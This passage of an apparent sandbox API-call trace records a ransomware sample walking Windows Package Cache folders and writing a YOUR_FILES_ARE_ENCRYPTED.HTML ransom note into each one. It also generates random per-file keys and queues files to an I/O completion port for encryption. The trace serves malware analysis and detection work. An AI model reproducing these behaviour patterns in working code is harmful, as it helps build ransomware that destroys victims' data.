lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 0 [0157.585] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.585] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0157.585] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.586] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.588] CloseHandle (hObject=0x598) returned 1 [0157.589] GetProcessHeap () returned 0x270000 [0157.590] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.590] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x87e9710, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x87e9710, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0157.591] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.591] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0157.591] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\d4036846864773e3d647f421dfe7f6ca536e307b\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.591] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.594] CloseHandle (hObject=0x58c) returned 1 [0157.594] GetProcessHeap () returned 0x270000 [0157.596] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.602] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", cAlternateFileName="{0FA68~1.285")) returned 1 [0157.602] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned 83 [0157.602] GetProcessHeap () returned 0x270000 [0157.602] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.604] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" [0157.604] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*" [0157.604] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.605] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.605] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0157.605] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned 92 [0157.605] GetProcessHeap () returned 0x270000 [0157.606] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.606] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" [0157.606] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*" [0157.607] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.607] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.607] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35bcbe50, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35bcbe50, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0157.607] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned 116 [0157.607] GetProcessHeap () returned 0x270000 [0157.607] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.610] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" [0157.610] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*" [0157.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35bcbe50, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35bcbe50, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.610] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35bcbe50, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35bcbe50, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.610] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b027600, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x1b027600, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x1b027600, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x4f83ae, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0157.610] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0157.610] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.611] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0157.611] lstrlenW (lpString=".cab") returned 4 [0157.611] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0157.611] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0157.611] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0157.611] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=5211054) returned 1 [0157.611] GetProcessHeap () returned 0x270000 [0157.611] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0157.617] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="4A") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="70") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="09") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="18") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="01") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="A5") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="FA") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="E5") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="3A") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="76") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="4E") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="3F") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="FF") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="87") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="3A") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="F7") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="E0") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="2A") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="1A") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="E8") returned 2 [0157.617] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="FD") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="8D") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="04") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="0E") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="D2") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="D6") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="35") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="34") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="40") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="8E") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="A3") returned 2 [0157.618] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="43") returned 2 [0157.619] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0157.619] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0157.619] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0157.625] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be2ab00, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x4be2ab00, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x4be2ab00, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0157.625] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 145 [0157.627] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.627] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0157.627] lstrlenW (lpString=".msi") returned 4 [0157.627] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0157.627] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be2ab00, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x4be2ab00, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x4be2ab00, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0157.627] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.628] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0157.996] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.997] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.999] CloseHandle (hObject=0x4a8) returned 1 [0157.999] GetProcessHeap () returned 0x270000 [0158.000] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0158.005] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35bcbe50, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35bcbe50, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0158.005] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0158.006] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0158.006] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0158.006] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0158.008] CloseHandle (hObject=0x598) returned 1 [0158.008] GetProcessHeap () returned 0x270000 [0158.009] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0158.010] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35ba5cf0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0158.010] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.010] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0158.010] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.011] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.013] CloseHandle (hObject=0x58c) returned 1 [0158.013] GetProcessHeap () returned 0x270000 [0158.014] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.014] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17987c30, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179add90, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179add90, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0158.014] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 82 [0158.014] GetProcessHeap () returned 0x270000 [0158.014] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.014] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: 